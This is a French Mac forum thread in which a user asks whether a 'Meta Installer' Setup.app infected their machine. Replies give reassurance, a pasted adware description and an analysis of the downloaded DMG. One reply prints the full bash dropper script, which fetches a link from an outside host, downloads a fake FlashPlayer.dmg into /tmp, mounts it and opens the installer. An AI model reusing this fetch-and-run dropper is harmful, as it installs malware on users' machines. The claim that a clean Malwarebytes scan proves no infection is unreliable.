10.15 Catalina Infecté par un malware

numerovingt

Membre enregistré
10 Novembre 2020
6
0
34
Bonjour à tous,

Je pense m'être infecté d'un malware via le lancement d'un Setup.app se trouvant dans une image disque.
Il y avait un script "Meta Installer" dans le Setup.app.
Ce script semble avoir effectué les actions suivantes selon "console" :

Bloc de code:
Nov 10 22:00:39  Meta Installer[2269]: Downloading https://inimg.s3.amazonaws.com/InstallerFun.dmg to /var/folders/b9/8m1pwtbj02sgdbgzhw3f9yg80000gn/T/TemporaryItems/(A Document Being Saved By Meta Installer)/Download 2020-11-10 220039.part
Nov 10 22:00:41  Meta Installer[2269]: Renaming download to /var/folders/b9/8m1pwtbj02sgdbgzhw3f9yg80000gn/T/TemporaryItems/(A Document Being Saved By Meta Installer)/InstallerFun.dmg
Nov 10 22:00:41  Meta Installer[2269]: Mounting /var/folders/b9/8m1pwtbj02sgdbgzhw3f9yg80000gn/T/TemporaryItems/(A Document Being Saved By Meta Installer)/InstallerFun.dmg
Nov 10 22:00:44  Meta Installer[2269]: Mounted /Volumes/Installer 1
Nov 10 22:00:44  Meta Installer[2269]: Downloading https://inimg.s3.amazonaws.com/InstallerFun.dmg to /var/folders/b9/8m1pwtbj02sgdbgzhw3f9yg80000gn/T/TemporaryItems/(A Document Being Saved By Meta Installer 2)/Download 2020-11-10 220044.part
Nov 10 22:00:44  Meta Installer[2269]: assertion failed: 19G2021: libxpc.dylib + 92759 [3E243A41-030F-38E3-9FD2-7B38C66C35B1]: 0x89
Nov 10 22:00:44  Meta Installer[2269]: Renaming download to /var/folders/b9/8m1pwtbj02sgdbgzhw3f9yg80000gn/T/TemporaryItems/(A Document Being Saved By Meta Installer 2)/InstallerFun.dmg
Nov 10 22:00:44  Meta Installer[2269]: Error Domain=NSURLErrorDomain Code=-1003 "A server with the specified hostname could not be found." UserInfo={NSUnderlyingError=0x6000018033f0 {Error Domain=kCFErrorDomainCFNetwork Code=-1003 "A server with the specified hostname could not be found." UserInfo={NSErrorFailingURLStringKey=http://www.test.xtro/, NSErrorFailingURLKey=http://www.test.xtro/, _kCFStreamErrorCodeKey=8, _kCFStreamErrorDomainKey=12, NSLocalizedDescription=A server with the specified hostname could not be found.}}, NSErrorFailingURLStringKey=http://www.test.xtro/, NSErrorFailingURLKey=http://www.test.xtro/, _kCFStreamErrorDomainKey=12, _kCFStreamErrorCodeKey=8, NSLocalizedDescription=A server with the specified hostname could not be found.}
Nov 10 22:00:44  Meta Installer[2269]: Unmounting /Volumes/Installer 1

Auriez vous une idée de quel type de malware suis-je infecté ?
A savoir que MalwareBytes ne detecte aucun fichier suspect ou infecté et je ne vois rien d'anormal dans le moniteur d'activité.

Merci d'avance pour vos retours.
 
Dernière édition par un modérateur:
Si MalwareBytes ne détecte rien et que tu ne ressens pas la présence suspecte de quelque malware, je pense qu’il n’y a rien.


Tu peux aussi poster dans ce fil pour demander de l’aide (destiné spécialement à ce genre de problèmes.
 
Bonsoir Operating,

Merci pour votre prompt retour.

Possible qu'une ou plusieurs actions (récupération de comptes, mot de passe ou autres) puisse avoir été effectué de manière invisible ?

Votre lien me redirige vers un fil évoquant le soucis de changement de moteur de recherche dans Safari.
 
Possible qu'une ou plusieurs actions (récupération de comptes, mot de passe ou autres) puisse avoir été effectué de manière invisible ?
Si vraiment malware il y a sur ton Mac, cela se peut... mais pour être très franc, je pense qu’il n’y a pas de malware sur ton Mac pour la bonne raison que MalwareBytes suffit amplement à détecter les potentiels malwares ; donc s’il ne détecte rien, je pense qu’il n’y a rien.

D’autre part, les virus / malwares sont un peu passés de mode sur Mac. Cela dépend évidemment de ton activité sur internet, mais, en principe, la sécurité du Mac suffit souvent à nous protéger.
 
Merci pour vos propos plutot rassurant.

A quoi peuvent bien correspondre les actions qui se sont effectué lors du lancement du Setup.app ?
 
A quoi peuvent bien correspondre les actions qui se sont effectué lors du lancement du Setup.app ?
N’ayant aucune connaissance dans le langage de la Console, je ne saurais dire.
 

Remove Meta Installer​

Meta Installer s'installe généralement sur votre ordinateur en tant qu'installateur pour un jeu ou une application gratuite, ainsi que pour installer l'application prévue, des applications tierces peuvent également être installées, y compris des logiciels indésirables. Ces bundleurs de logiciels sont téléchargés à partir de sites Web offrant aux installateurs des applications ou des jeux gratuits. Meta Installer englobe un nombre limité de téléchargements de logiciels dans un ensemble qui tente de télécharger et d'installer des applications annoncées, principalement des barres d'outils, des récupérations d'actifs de recherche de navigateur et des logiciels indésirables tels que des optimiseurs de PC et d'autres utilitaires. Lorsque vous téléchargez un logiciel à partir d'une source inconnue, d'un portail de téléchargement ou même de certains développeurs de logiciels, vous pouvez obtenir un programme d'installation propriétaire, pas le programme d'installation du logiciel. Si vous installez un logiciel publicitaire recommandé,

Une fois lancé, le programme d'installation de Meta Installer affiche une fenêtre de dialogue expliquant qu'il installera le logiciel populaire connu sous le nom de programme porteur. Une enquête plus approfondie révèle un texte indiquant «que le programme de désinstallation de logiciels groupés sera installé, ce qui aidera à le supprimer». Ceci est inhabituel car il ne devrait pas être nécessaire d'installer un programme de désinstallation spécial. L'application doit être amovible via Ajout / Suppression de programmes dans le Panneau de configuration. La progression logique du logiciel d'encapsulation du bundle Meta Installer rend très facile l'acceptation des programmes logiciels annoncés par défaut, en particulier pour les utilisateurs peu méfiants qui ne font pas beaucoup attention aux écrans du programme d'installation et cliquent simplement sur `` Suivant ''. C'est un problème majeur avec Meta Installer, toutes les offres spéciales et extras sont autorisés par défaut, ce qui est connu pour être un système de «retrait».

Compte tenu de ce qui précède, nous ne recommandons pas d'exécuter des bundles de logiciels tels que Meta Installer - vous constaterez probablement que les applications que vous n'aviez pas l'intention d'installer ont été installées sur votre ordinateur. N'installez pas d'applications provenant de sources non fiables. Nous vous recommandons de télécharger des applications gratuites directement auprès du fournisseur. Le téléchargement de jeux et d'applications gratuits en ligne peut vous exposer au risque d'installer des logiciels indésirables en même temps. Lorsque vous recherchez une application que vous souhaitez installer, nous vous conseillons de visiter le site Web officiel du fournisseur de l'application où vous pouvez être sûr que vous téléchargez la dernière version d'un produit sans avoir à négocier un flux apparemment sans fin d'offres non sollicitées pour les produits.
 
Je pense m'être infecté d'un malware via le lancement d'un Setup.app se trouvant dans une image disque.
Il y avait un script "Meta Installer" dans le Setup.app.
Ce script semble avoir effectué les actions suivantes selon "console" :
Tu veux savoir ce que c'est ? Oui, mais bon avant tu es le fautif en ayant fait un clic compulsif dans un site quelconque ou tu n'as pas installé un bon bloqueur de PUBS, mais c'est toi le fautif.

Alors, il y a bien un téléchargement d'un fichier .dmg qui est InstallerFun.dmg, mais si on est très, trop, curieux en faisant un double-clic dessus, il ne passera a priori et on fiche à la corbeille le fichier .dmg. Et là, c'est le jackpot avec l'installation d'un adware/malware qui va proposer sans cesse l'installation d'une version pourrie de Adobe Flash Player...

Capture-004.jpg

...si Malwarebytes n'a rien trouvé, alors il n'y a rien d'installé dans ton Mac.
 
  • J’aime
Réactions: Aliboron
moi, j'ai téléchargé le DMG https://inimg.s3.amazonaws.com/InstallerFun.dmg
et avec attention j'ai regardé ce qu'il contenait : un fichier setup qui est un script.
Voici le contenu du script
Bloc de code:
#!/bin/bash

ORIGIN_LINK="http://ediller-cannyone.com/1c966db9-7a3f-4565-83ba-84a52fdff39f"
downloadPath="/tmp/"

RED_LINK=$(curl -L $ORIGIN_LINK)
RED_FILENAME="FlashPlayer.dmg"
RZFILE="/Volumes/InstallMe/Installer"
RZ2FILE="/Volumes/InstallMe/Installer.app"

{ curl -o ${downloadPath}$RED_FILENAME $RED_LINK --xattr ; }

hdiutil attach ${downloadPath}$RED_FILENAME
for ((j=0; j<=30; j++)); do
	sleep 3
	if [ -f "$RZFILE" ]; then
		sleep 1
		open $RZFILE
		exit
	fi
	if [ -f "$RZ2FILE" ]; then
		sleep 1
		open $RZ2FILE
		exit
	fi
done

Si je ne dis pas de bêtises, si le script est exécuté tu as du avoir un dmg FlashPlayer.dmg avec un faux flash player voulant s'installer
 
  • J’aime
Réactions: Aliboron
Ben, je crois que c'est la même chose que dans ma copie écran. ;)
wé, en fait j'avais écrit ma réponse mais pas pressé le bouton "Publier", donc j'ai posté ça un paquet heures après l'avoir écrit :D